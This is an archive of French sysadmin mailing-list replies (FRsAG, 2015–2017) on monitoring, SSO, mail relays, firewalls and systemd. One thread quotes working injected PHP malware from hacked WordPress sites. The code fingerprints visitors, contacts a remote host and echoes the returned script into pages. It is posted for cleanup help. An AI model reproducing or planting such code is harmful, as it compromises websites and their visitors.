Re: [FRsAG] monitoring transactionnel de site web

2015-01-30 Thread Guillaume Tournat 
Zabbix fait cela très bien. Et plein d'autres choses en WebUI. 


> Le 30 janv. 2015 à 16:15, guillaume pancak  a écrit :
> 
> Bonjour la liste,
> 
> Je cherche un outil/service de monitoring/audit de site web pouvant générer 
> des rapports de mesures de performance en fonction d’un parcours scénarisé.
> 
> je connais déjà pingdom, mais j’imagine qu’il y a mieux ;)
> 
> si vous avez un retour d’expérience sur ce sujet, ça m’intéresse ;)
> 
> merci
> 
> Guillaume.
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Quel outil pour le suivi des actions

2015-02-07 Thread Guillaume Tournat 
Sinon, OVH utilise Flyspray pour son site travaux.ovh.net


> Le 7 févr. 2015 à 16:21, Matthieu Racine  a écrit :
> 
> Nous utilisons RedMine, très paramétrable, te permet de définir toi même tes 
> workflows et les différents états.
> S'interface avec des outils de gestion de version (Subversion, Git...)
> De nombreux plugins...
> Pas forcément le plus simple à prendre en main, mais très puissant.
> 
> http://www.redmine.org/
> 
> cordialement,
> --
> Matthieu
> 
> Le 07/02/15 12:54, Arnaud Serrut a écrit :
>> Bonjour la liste,
>> 
>> Je suis à la recherche d'un outil permettant de suivre les actions (à 
>> réaliser, en cours, terminées).
>> Dans un ancien boulot, on utilisait Jira d'Atlassian, grâce aux taches 
>> épiques et sous-tâches et un workflow ouvert/en cours/terminé, mais je me 
>> demandais s'il y avait d'autres outils permettant le même service, 
>> idéalement en open-source.
>> 
>> Actuellement dans mon boulot, l'outil utilisé, c'est principalement l'oral 
>> et les mails et c'est pas vraiment les outils les mieux adaptés...
>> 
>> Cordialement,
>> Arnaud Serrut
>> 
>> 
>> ___
>> Liste de diffusion du FRsAG
>> http://www.frsag.org/
> 
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Détecteurs de malwares

2015-06-03 Thread Guillaume Tournat 
 Fait déjà commencer par désactiver certaines fonctionnalités dangereuses dans 
php (disabled_functions dans php.ini)

Ensuite bloquer les requêtes http sortantes du serveur avec iptables. 



> Le 3 juin 2015 à 11:23, Pierre  a écrit :
> 
> Hello,
> 
> Je me permet de relancer la discutions car j'ai presque le même problème
> avec un client.
> 
> Sauf que le code change sur presque tout les fichiers.
> 
> Voici un exemple de code :
> 
>  #568ba2#
> error_reporting(0); @ini_set('display_errors',0); $wp_f67188 =
> @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i',
> $wp_f67188) && !preg_match ('/bot/i', $wp_f67188))){^M
> $wp_f0967188="http://"."theme"."header".".com/"."header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_f67188);^M
> if (function_exists('curl_init') && function_exists('curl_exec')) {$ch =
> curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt
> ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M
> $wp_67188f = curl_exec ($ch); curl_close($ch);} elseif
> (function_exists('file_get_contents') && @ini_get('allow_url_fopen'))
> {$wp_67188f = @file_get_contents($wp_f0967188);}^M
> elseif (function_exists('fopen') &&
> function_exists('stream_get_contents'))
> {$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M
> if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; }
> #458ba2#
> ?>
> Ou encore
> 
>  #5a9312#
> 
> 
> if (function_exists('curl_init') && function_exists('curl_exec')) {$ch =
> curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt
> ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M
> $wp_67188f = curl_exec ($ch); curl_close($ch);} elseif
> (function_exists('file_get_contents') && @ini_get('allow_url_fopen'))
> {$wp_67188f = @file_get_contents($wp_f0967188);}^M
> elseif (function_exists('fopen') &&
> function_exists('stream_get_contents'))
> {$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M
> if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; }
> #/5a9312#
> ?>
> 
> 
> J'ai essayé beaucoup de sed et xargs, mais le code est trop complexe
> pour arrive a faire un truc propre.
> 
> find . -type f -name "*.php" -print | xargs sed -i.hacked 's/^ *?>//g'
> 
> Le seul point commun est un début  fin un autre # saute de ligne ?>
> 
> J’essaie d'utiliser https://github.com/planet-work/php-malware-scanner
> 
> Mais cela ne semble mal fonctionner avec mon problème.
> 
> Auriez vous une idée ?
> 
> Merci
> 
> Pierre
> 
> 
> Le 20/05/2015 16:09, Julien Escario a écrit :
>> Le 20/05/2015 07:14, Jonathan Leroy a écrit :
>>> J'ai eu une demande de "nettoyage" de sites WordPress ayant été hackés hier.
>>> 
>>> J'en ai donc profité pour tester tous vos outils sur un des sites.
>> 
>>> Le grand gagnant est php-malware-scanner de Frédéric, qui détecte deux
>>> fichiers de plus que Sucuri (mais en laisse passer un autre).
>>> J'ai mis un tableau comparatif en PJ pour ceux que ça intéresse :)
>> 
>> Nice job !
>> 
>> Merci du retour.
>> Julien
>> 
>> 
>> 
>> ___
>> Liste de diffusion du FRsAG
>> http://www.frsag.org/
> 
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] SSO

2015-06-05 Thread Guillaume Tournat 
Pour du web il y a Vulture Project qui est très bien.  



> Le 5 juin 2015 à 17:37, Barthélemy Vessemont  a écrit :
> 
> Hello à tous,
> 
> Au risque de mettre les pieds dans le plat, LemonLDAP n'est il pas un projet 
> très "franco-francais", très peu lisible, à la gouvernance et la 
> communication quasi inexisante et au site web ainsi que la doc archaique ? :D
> 
> J'ai longtemps bossé en tant qu'intégration Shibboleth et openAM (avec 
> mention LDAP et syncrhonistion) et j'ai toujours trouvé que LemonLDAP n'était 
> pas très "qualitatif" ni très adapté aux structures moyennes et grosses.
> 
> Perso aujourd'hui je me pencherais davantage sur Keycloak ( 
> http://keycloak.jboss.org ) qui est certes jeune et porté par RedHat, mais 
> qui fonctionne pas mal et qui a une belle roadmap !
> 
> bien à vous
> 
> 2015-06-05 15:11 GMT+02:00 HURTEVENT VINCENT 
> :
>> Bonjour,
>> 
>> 
>>> Le 5 juin 2015 à 13:55, Benjamin AVET  a écrit :
>>> 
>>> Je suis à la recherche d'une solution de SSO pour un environnement presque 
>>> exclusivement Windows (poste de travail et serveur) et un peu de Red Hat.
>>> 
>>> Quels sont selon vous les critères de recherche et de sélection à retenir ?
>> 
>> 
>> 
>> Recherches tu une solution de SSO « système » pour l’ouverture de session 
>> Windows, Linux, SSH ? ce que Kerberos peut fournir ou du SSO Web ?
>> 
>> En SSO Web, largement déployé et utilisable par bien des applications web ou 
>> via des bibliothèques reconnues, il y a le protocole CAS qui  peut te faire 
>> du SSO + diffusion d’attributs. La partie serveur (CAS Server) est très 
>> configurable avec des sources d’authentification longue comme le bras.
>> 
>> Tu as également le protocole SAML, qui te permet de faire du SSO « fédéré » 
>> avec d’autres fournisseurs, des services SaaS, etc 
>> 
>> En protocole 2.0, OAuth2.0 qui intègre de l’authentification type openID aux 
>> mécanismes d’autorisation OAuth, mais pour une mise en place en tant que 
>> fournisseur d’identité ca risque d’être bien plus compliqué et souvent 
>> réservé à des gros acteurs visible (Facebook, google, twitter)
>> 
>> Pour une expérience utilisateur full SSO, tu peux combiner : Kerberos + CAS 
>> (deleg kerberos) + SAML (via Shib). En théorie, une seule action 
>> d’authentification permet à l’utilisateur d’accéder à tous les services : 
>> systèmes, web on premise, SaaS.
>> 
>> En soft serveur qui font un peu tout :
>> 
>> - LemonLDAP
>> - CAS Server
>> - Gluu 
>> 
>> avec un annuaire + un royaume Kerberos (Active Directory ?) en backend
>> 
>> ___
>> Liste de diffusion du FRsAG
>> http://www.frsag.org/
> 
> 
> 
> -- 
> Barthélemy Vessemont - bvessem...@gmail.com
> Ingénieur en informatique diplômé de l'UTC (Compiègne)
> Contributeur Chef (redguide@github)
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Solution backup externalisé

2015-07-15 Thread Guillaume Tournat 
Il suffit de monitorer tout ça avec nagios ou zabbix



> Le 15 juil. 2015 à 11:10, Jonathan Tremesaygues 
>  a écrit :
> 
> Je suis en train de mettre en place une solution similaire à base de 
> backupninja/duplicity/hubic.
> 
> Pour l'instant, ça a l'air de pas trop mal marché. 
> Le gros inconvénient que je trouve à cette solution, c'est que ça manque d'un 
> machin centralisé à la backuppc pour configurer et surveiller l'ensemble 
> (actuellement, chaque machine se gère elle même). Le jour où ça partira en 
> couille, je sens que je pleurerai très fort...
> 
> Cordialement,
> Jonathan
> 
>> On 07/15/2015 10:42 AM, Rémy Sanchez wrote:
>> Hello,
>> 
>>> On Wed, Jul 15, 2015 at 10:11 AM Jhonny CASTILLO  wrote:
>>> nous devons externalise nos donnes et je voudrais savoir si vous avez des 
>>> idées SVP
>> 
>> Je suis généralement pas fan d'Amazon, mais chez nous on est en train de 
>> mettre en place des backups off-site à base de duplicity et Amazon Glacier, 
>> pour l'instant ça s'annonce bien (des retours à ce sujet d'ailleurs ?) 
>> -- 
>> Rémy Sanchez
>> http://hyperthese.net/
>> 
>> 
>> ___
>> Liste de diffusion du FRsAG
>> http://www.frsag.org/
> 
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Mises à jour Microsoft, Squid et cache

2015-09-04 Thread Guillaume Tournat 

Le 04/09/2015 13:09, Benoit Mortier a écrit :

Le vendredi 4 septembre 2015, 12:39:39 nikolaii a écrit :

On 09/04/2015 11:53 AM, Benoit Mortier wrote:

le logiciel libre opsi, plus un abonnement au mise a jour windows
package pour aller avec le serveur te permettra de desactiver les mise
a jour windows et de faire tout cela de manieère centralise,
reproductible et selectionnable par pc si tu le veux
http://www.opsi.org/en?set_language=en Bonne journée

Merci, en effet d'après ce que je viens de lire cette solution à l'aire
prometteuse (avec gestion des autres logiciels en plus). Par contre je
n'ai pas compris l'histoire de l'abonnement aux mises à jour Windows ?
Microsoft propose ce genre de service afin de télécharger les correctifs
?

non microsoft ne le propose pas :) les concepteur de cette solution
recuperent les patch lors du patch tuesday et le meme sous forme de
paquets afin de pouvoir etre diffuse par leur solution, d'ou le fait que ce
soit un abonnement.

En effet cette solution est geniale pour la gestion du parc windows on peut
deployer ce qu'on veut et faire la gestion complete installation,
deploiement de logiciel pour obtenir des postes installe en une etape




Et WSUS, ça ne sert pas à cela ??
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Outil Monitoring

2015-10-20 Thread Guillaume Tournat 



Le 20/10/2015 09:56, SIMANCAS Hugo a écrit :


Bonjour,

Qu’utilisez-vous en outil de monitoring :

-Logs Windows

-Test par scénarios d’applications web

Qui soit simple et efficace ?




Zabbix, c'est open source, et ça fait tout ça
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Outil Monitoring

2015-10-20 Thread Guillaume Tournat 

Le 20/10/2015 18:47, SIMANCAS Hugo a écrit :


Bonjour,

Merci messieurs, justement zabbix m’intéressait, surtout pour la 
simplicité des agents windows, mais c’est vrai que c’est la misère à 
paramétrer.


Merci




personnellement, je ne trouve pas. il faut rentrer dans la logique du 
produit au départ, mais c'est bien fait.
les templates permettent d'avoir rapidement des informations probantes. 
après il faut le faire vivre et suivre les évolutions du SI.

mais fonctionnellement, il est très complet.
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Apache mpm-itk et mod_evasive

2015-11-23 Thread Guillaume Tournat 
Salut

Il y a l'équivalent de mod evasive pour nginx. En reverse proxy en frontal. 

Et tu laisses ton Apache en backend. 


> Le 23 nov. 2015 à 08:04, "cam.la...@azerttyu.net"  a 
> écrit :
> 
> Salut tout le monde
> 
> Je suis en train d'expérimenter mod_evasive pour mes serveurs
> debian/apache et je me rend compte que cela ne fonctionne pas.
> 
> En grattant le dos du net, j'ai vu que selon le mode prefork ou pas
> d'apache cela pouvait ne pas fonctionner comme attendu.
> 
> De ce que je vois avec le mode mpm-itk , mod_evasive ne peut pas
> fonctionner correctement.
> D'où ma question quelles sont les alternatives possibles ou quelles
> seraient les configuration possibles ?
> 
> Merci
> 
> Km
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Debian et SAN FC/iSCSI

2015-12-23 Thread Guillaume Tournat 

Le 23/12/2015 18:21, Frederic Dhieux a écrit :

Bonsoir,

Nous avons actuellement un projet de stockage concernant une de nos 
plateforme en partie sous Debian. Actuellement ni EMC ni Netapp ne 
supportent officiellement Debian, j'imagine que pour autant il n'est 
pas trop compliqué d'en faire le mariage.


Par contre nous avons quelques craintes sur d'éventuelles surprises 
avec le temps au gré des upgrades kernel ou autres. On envisage de 
faire du multipath sur le FC et on a croisé quelques bugs sur les 
mailings Debian sur ce point (notamment 
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=740701 ).


Je voulais savoir un peu si des gens ici ont l'expérience du FC et de 
l'iSCSI sous Debian avec EMC ou Netapp et s'ils ont une bonne 
expérience dans la durée, en particulier en multipath. Egalement 
savoir si la différence entre les 2 technos (hormis l'écart important 
de prix) était devenu maintenant négligeable ou pas ? (perfs et 
fiabilité)




pourquoi de la Debian en direct sur les hosts ?
tu mets tout sous vSphere, et après, tu ne t'occupes pas du multipath 
dans tes VM debian...


gu!llaume
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] record spf orange-business

2016-01-28 Thread Guillaume Tournat 



Ca va pas me prendre la tete deux ans. on va dejà degager le mode
strict (-) du spf, puis ajouter un dkim sur le serveur et arreter le
relai par oleane. ca sera peut-être un peu moins performant, mais au
moins, on maitrisera le truc!




rien de tel que de maitriser ses relais smtp.
Postfix est d'enfer pour cela.
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Coup de main IIS + PHP + MySQL - W12

2016-02-22 Thread Guillaume Tournat 

Le 22/02/2016 09:46, SIMANCAS Hugo a écrit :


Bonjour,

Je dois installer PHP + MySQL sur un Windows 2012.

Si vous aviez-vous des infos, procédures, préconisations, billes ce 
serait super.


Ps : Le client a refusé d’installer ça sous Linux.

Merci




et dans une VM Linux, sur l'Hyper-V du 2012 ?
:-)
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Cache comptes Admins PCs Windows / Active Directory

2016-02-25 Thread Guillaume Tournat 
Avec DirectAccess


> Le 25 févr. 2016 à 13:45, SIMANCAS Hugo  a 
> écrit :
> 
> Bonjour,
>  
> Existe-t-il une méthode pour pousser en cache des comptes admins dans un 
> environnement active directory.
>  
> Je m’explique, comment faire pour prendre la main en mode admin sur un PC 
> hors connexion où on ne s’est jamais connecté (typiquement des commerciaux 
> ayant un client VPN HS) ?
>  
> Merci d’avance
>  
> Hugo
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] [postifx] infra type dolist

2016-03-23 Thread Guillaume Tournat 

Le 23/03/2016 15:57, philippe gracia a écrit :

Bonjour à tous.
je cherche une solution pour envoyer des mail "retenus" dans une file 
d'attente et libérée à une heure donnée. Les mails au départ sont 
issus de commerciaux adeptes de paint et word qui envoient chacun 350 
mails de 2Mo avec thunderbird ! L'idée, c'est de différer le départ 
pour éviter l'engorgement de la pauv' sdsl 2Mo!
serveur linux, Zimbra en frontal départ , on peut tout envisager 
derrière :)




Postfix sait faire cela, avec du "postpone"
Comme c'est le MTA utilisé par Zimbra, ça devrait être assez simple.

Avec des règles de type "access", on peut marquer les emails concernés 
en HOLD
Et les libérer le soir à l'heure voulue, via une crontab, et un 
"postsuper -H all"

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] [postifx] infra type dolist

2016-03-24 Thread Guillaume Tournat 

Le 24/03/2016 10:26, Laurent a écrit :

Le 23/03/2016 15:57, philippe gracia a écrit :

Les mails au départ sont issus de commerciaux adeptes de paint et word
qui envoient chacun 350 mails de 2Mo avec thunderbird ! L'idée, c'est 
de

différer le départ pour éviter l'engorgement de la pauv' sdsl 2Mo!


L'idée, c'est bien de différer les mails de ces utilisateurs là, pour
"laisser de la place" aux autres utilisateurs pour les autres
applications (y compris le mail, d'ailleurs, peut-être) ?
Je n'ajouterai rien à ce qui a déjà été dit..

Mais à part ça, je ne comprend pas très bien en quoi le fait de tout
balancer d'un coup à heure fixe va aider à désengorger la ligne.
Tu vas au contraire d'avoir une saturation maximale à ces heures là, et
tes autres utilisateurs seront bloqués plus longtemps..
Sans compter que tes commerciaux vont te demander pourquoi leurs 
clients

reçoivent leurs mails 3 plombes plus tard.

Une petite formation au bon usage des mails ne serait-elle pas plus
efficace ?



sinon, utiliser un provider smtp pour ces envois en masse, genre 
mailjet, mailchimp, sendgrid, ...

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Choix du certificat

2016-03-31 Thread Guillaume Tournat 
Pour le domaine AD interne, une autorité de certificats (PKI) privée, intégrée 
au domaine, suffit. Et c'est gratuit. 


> Le 31 mars 2016 à 18:48, Sylvain Nex  a écrit :
> 
> Bonjour à tous,
> 
> Je vais mettre en place des certificats commerciaux pour tous mes serveurs où 
> c'est nécessaire, mais j'utilise deux racines différentes :
> 
> - *.domain.com pour ce qui est accessible depuis l’extérieur (domaine acheté 
> chez un registrar)
> - *.ad.domain.com pour tout ce qui est interne (domaine géré par mon 
> contrôleur de domaine)
> 
> Je suis donc obligé de prendre 2 certificats wildcard différents ?
> 
> Autre question, pourquoi un tel écart de prix entre certains revendeurs de 
> certificats ? L'assurance peut être ?
> 
> Merci.
> 
> SylvainH
> 
> 
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] infection viral par mail

2016-05-17 Thread Guillaume Tournat 
Salut

Avec les firewalls Fortinet, on peut mettre une FortiSandbox. 

Sinon chez TrendMicro, il y a Deep Discovery qui s'interface avec les relais 
mail IMSVA, les proxy IWSVA, l'antivirus Officescan. 

A+

> Le 17 mai 2016 à 17:30, ay pierre  a écrit :
> 
> bonjour à tous,
> 
> soucieux des différents problèmes que nous rencontrons actuellement (
> grosse vague de virus par des systèmes aussi surprenant les un que les
> autres mais principalement via les mails)
> 
> nous sommes actuellement à la recherche d'un système de sandbox
> physique que nous pourrions mettre en place dans notre data-center.
> 
> 
> Avez-vous des retours de système(s) qui fonctionne(nt) plutôt bien
> avec des investissements pas trop lourd..
> 
> nous rejetons tout système open source (sauf si support intégrer
> moyennent finance)
> 
> A votre écoute :)
> 
> bien cordialement
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Firewall UTM

2016-05-20 Thread Guillaume Tournat 
La demande était Firewall UTM, donc il n'y a pas que du VPN a priori. 

Fortinet propose de très bons firewalls, il y a plein de modèles selon le 
besoin. 


> Le 20 mai 2016 à 18:07, Nathan delhaye  a écrit :
> 
> Hello!
> 
> Bon c'est 'dredi donc c'est permis : et OpenVPN?
> 
> Perso je fait tourner une infra perso avec de l'OpenVPN en mode L2 depuis 
> plus de 6 ans et je n'ai jamais eu aucun problème. J'ai même fait tourner les 
> front web @taf-1 d'un (très) gros client média sur un bridge openvpn L2 entre 
> 2 datacenter le temps d'une migration (1 mois). Pas de souci a signaler non 
> plus.
> 
> Au niveau config c'est pas compliqué du tout et la HA peut se faire avec du 
> heartbeat à l'ancienne.
> 
> Ca te coûte un Raspberry/NUC de chaque côté (voire deux de chaque côté, si 
> t'aime la redondance) et un peu de temps. 
> 
> A+ !
> 
>> Le 20 mai 2016 à 17:13, fatiha boudj via FRsAG  a écrit :
>> 
>> les sonicwall  Tz sont  très bien et très faciles à configurer on peut très 
>> facilement configurer  une bascule du vpn sur un deuxième lien en cas de 
>> panne du premier lien.
>> 
>> 
>> 
>> 
>> 
>> De : Marek HASSAN 
>> À : Jonathan Tremesaygues ; French SysAdmin 
>> Group  
>> Envoyé le : Vendredi 20 mai 2016 15h58
>> Objet : Re: [FRsAG] Firewall UTM
>> 
>> Bonjour,
>> 
>> Si tu n'y connais pas grand-chose en réseau, le plus "plug'n play" doit être 
>> Sophos.
>> Ils ont une solution simple à mettre en œuvre, un boitier UTM sur le site 
>> principal et des boitiers RED sur les plus petits sites.
>> 
>> Au niveau maintenance tu pilote tout sur l'interface de l'UTM du site 
>> principal (Firewalling, NAT, Serveur web virtuel, filtrage http, etc...)
>> 
>> Pour l'avoir mis en place chez quelques clients, c'est plûtot stable surtout 
>> vu le nombre d'utilisateurs.
>> Une fois que tu as compris la logique du glissez-deposer sur l'interface ça 
>> roule tout seul.
>> 
>> Marek 
>> 
>> -Message d'origine-
>> De : FRsAG [mailto:frsag-boun...@frsag.org] De la part de Jonathan 
>> Tremesaygues
>> Envoyé : vendredi 20 mai 2016 15:50
>> À : French SysAdmin Group 
>> Objet : [FRsAG] Firewall UTM
>> 
>> Bonjour la liste.
>> 
>> Je suis à la recherche de deux firewall UTM pour protéger et interconnecter 
>> en VPN deux de nos sites. Le premier site a une quinzaine d'utilisateurs et 
>> le second une demi-dizaine. Ces valeurs vont très certainement augmenter 
>> dans un futur proche.
>> Pour l'instant, j'ai repéré les Sophos XG Firewall, SonicWall TZ et Cisco 
>> ASA, mais je n'y connais pas grand chose en réseau ^^'.
>> Auriez-vous des remarques, conseils, ou suggestions à me faire part 
>> concernant ces produits ou d'autres ?
>> 
>> Merci d'avance.
>> 
>> Jonathan  
>> ___
>> Liste de diffusion du FRsAG
>> http://www.frsag.org/
>> 
>> ___
>> Liste de diffusion du FRsAG
>> http://www.frsag.org/
>> 
>> 
>> 
>> ___
>> Liste de diffusion du FRsAG
>> http://www.frsag.org/
> 
> 
> 
> -- 
> Nathan Delhaye
> 06 69 27 64 25
> 0805 696 494
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Supervision haute fréquence d'application web

2016-05-26 Thread Guillaume Tournat 
Zabbix peut faire cela avec les scénarios web. 


> Le 26 mai 2016 à 05:13, Wallace  a écrit :
> 
> Bonjour,
> 
> Je cherche une méthode simple (logiciel ou scripts) pour superviser sur
> quelques heures une page web.
> 
> Les besoins sont :
> - récupérer la réponse http et si 30x donner la destination
> - mesurer le temps de réponse
> - mesurer le temps de first byte
> - récupérer des champs dans les header http
> - faire tourner cela toutes les secondes et les stocker en base ou
> fichier à plat
> 
> Dans un deuxième temps analyser le tout de manière graphique sur un
> chart avec zoom.
> 
> La problématique est que lorsque le cache expire toutes les 5 min (le
> client ne veut pas plus de temps de rétention) l'application derrière
> produit parfois des redirections sur lui même au lieu de délivrer la page.
> On veut mettre en évidence ce souci et avoir des preuves précises.
> 
> Merci pour vos pistes :)
> 
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] [HS] ou pas :: Voila.fr :: c'est mort ?

2016-09-07 Thread Guillaume Tournat 
Merci Jacques pour l'astuce Postfix (meilleur MTA du monde ;-))


> Le 7 sept. 2016 à 21:47, Jacques Lav!gnotte.  a écrit 
> :
> 
>> Le 07/09/2016 à 16:25, Dominique Rousseau a écrit :
>> 
>> (mais un gestionnaire de liste de diffusion meticuleux devrait deja les
>> avoir viré, vu que ca bounce depuis un moment)
> 
> Les gestionnaires de listes qui regardent les bounces il y en  a sûrement :)
> 
> 
> Pour le gestionnaire du serveur (/me) c'est:
> 
> /etc/postfix/transport
> :::
> voila.fr error:voila.fr est HS.
> 
> Merci, Jacques
> 
> -- 
> GnuPg : C8F5B1E3 WeUsePGP Because privacy matters http://weusepgp.info/
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Un installer lamp automatique pour Debian 8

2016-12-07 Thread Guillaume Tournat 
J'ai développé une allergie à systemd
Mais ça va mieux depuis que j'ai trouvé un howto pour remettre sysvinit sur 
debian8 ;-)


> Le 7 déc. 2016 à 23:40, Bruno Pagani  a écrit :
> 
>> Le 07/12/2016 à 21:40, Christophe Casalegno (DN) a écrit :
>> 
>> Bon pour le coup, on va voir si ça passionne :
>> https://twitter.com/Brain0verride/status/806598323830456320
>> 
>> une install ntpd est de toute manière plus rapide que taper dans la
>> cron, ça c'est sur :)
>> 
>> amicalement,
> 
> systemd-timesyncd :p
> 
> Bruno
> 
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Un installer lamp automatique pour Debian 8

2016-12-08 Thread Guillaume Tournat 
salut Jacques

http://without-systemd.org/wiki/index.php/How_to_remove_systemd_from_a_Debian_jessie/sid_installation

A+


> Le 8 déc. 2016 à 17:52, Jacques Lav!gnotte.  a écrit :
> 
>> Le 08/12/2016 à 07:16, Guillaume Tournat a écrit :
>> 
>> Mais ça va mieux depuis que j'ai trouvé un howto pour remettre sysvinit sur 
>> debian8 ;-)
> 
> 'tégriste !
> 
>Fais-voir ce HOWTO ?
> 
> J.
> 
> 
> Bonjour chez toi.
> 
> -- 
> GnuPg : C8F5B1E3 WeUsePGP Because privacy matters http://weusepgp.info/
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Un installer lamp automatique pour Debian 8

2016-12-09 Thread Guillaume Tournat 

Le 08/12/2016 à 19:21, Mrjk a écrit :

Salut,

Loin de moi de vouloir relancer un troll qui devient vieux comme le
monde à ce stade, mais que reproche-tu concrètement à sytemd? C'est le
point de vue de l'admin qui fait de la prod qui m’intéresse (je ne
sais pas si tu es dans ce cas).

En ce qui me concerne, et étant sysadmin, je trouve que ça a apporté
un grand confort, surtout quand on utilise des outils du type
Ansible/Puppet sur différentes plateforme. Une interface pour tous les
masteriser. J'ai encore du mal à comprendre ce que l'on peut reprocher
a systemd.


leur manie de tout recoder dans systemd, jusqu'au resolver dns, au 
client dhcp, ...

les logs en binaire, illisible directement, sans les commandes idoines
c'est développé par gnome
je trouve que ça opacifie le boot, à faire trop de trucs
et quand ça bug, du coup, ça fait des trucs moches.

et puis, j'ai du prendre mes petites habitudes aussi :-)
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] journalisation des accès http/https sans proxy

2016-12-22 Thread Guillaume Tournat 

Le 21/12/2016 à 22:40, Christophe Dezé a écrit :

bonjour,

Quelles solutions connaissez vous pour journaliser les accès aux sites 
web au travers d'un routeur sans utiliser de proxy (type squid) ?


typiquement un routeur linux avec plusieurs cartes réseaux.


avec un firewall Fortinet, tu peux faire cela (avec authent transparente 
AD, blocage par catégorie, par application, déchiffrement SSL, antivirus)
le filtrage se fait à la volée, sans proxy. tu as les logs en local une 
semaine, dans l'interface d'admin.


ensuite, tu peux envoyer les logs :
  - par syslog (logs bruts)
  - par internet, sur leur plateforme FortiCloud (avec analyse, reporting)
  - en local, sur un FortiManager ou Analyzer (idem)


gu!llaume
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Recherche ordonnanceur libre

2017-06-07 Thread Guillaume Tournat 
Je n'ai pas du tout accroche Salt. 
Les packages Debian sont nuls (ils ne se mettent pas à jour par apt-cron), il 
faut 50 dépendances, qui changent à chaque version. 

Et on ne sait jamais trop ce qu'il fait ou pas. 
Alors soit je m'y suis pris comme un pied, ce qui n'est pas à exclure, soit 
vraiment c'est nase. 


> Le 7 juin 2017 à 20:57, Luc Didry  a écrit :
> 
> mercredi 7 juin 2017, 19:36:33 CEST bougie wrote:
>>> Le 07/06/2017 à 19:07, Alexandre a écrit :
>>> Bonjour à tous,
>>> 
>>> je me permets de vous solliciter car je souhaiterai mettre un
>>> ordonnanceur pour pouvoir planifier/exécuter des tâches sur plusieurs
>>> machines. L'environnement est full Linux. Auriez-vous des infos ?
>>> 
>>> J'ai un collègue qui m'a proposé Chronos
>>> https://mesos.github.io/chronos/, ca semble très bien.
>>> 
>>> Merci pour vos retour.
>>> 
>>> Alex.
>>> 
>>> ___
>>> Liste de diffusion du FRsAG
>>> http://www.frsag.org/
>>> 
>> Bonjour
>> 
>> Tu peux aussi regarder du coté de http://rundeck.org/.
>> Cela fait longtemps que je n'ai pas testé mais à l'époque, ça m'avait
>> bien plu (simple à installer et configurer pour une utilisation basique
>> et le tout assez intuitif).
>> 
>> B0ugie.
> 
> Moi j'utiliserai Salt ou Ansible pour gérer les cron des machines ou exécuter
> des commandes dessus.
> -- 
> Luc
> https://fiat-tux.fr/
> https://luc.frama.io/
> Internet n'est pas compliqué, Internet est ce que vous en faites.
> 
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Lisibilité des mailer-daemon

2017-06-09 Thread Guillaume Tournat 

Le 09/06/2017 à 08:56, David Ponzone a écrit :

Tous,

Question pour ma culture générale:

Avant-hier, à l’occasion d’un mailing fait par ma femme pour l’anniversaire de 
mon fils, elle a reçu (évidemment) quelques mailer-daemon.
Je ne dis pas que ma femme est une ignorante dans le domaine, c’est juste une 
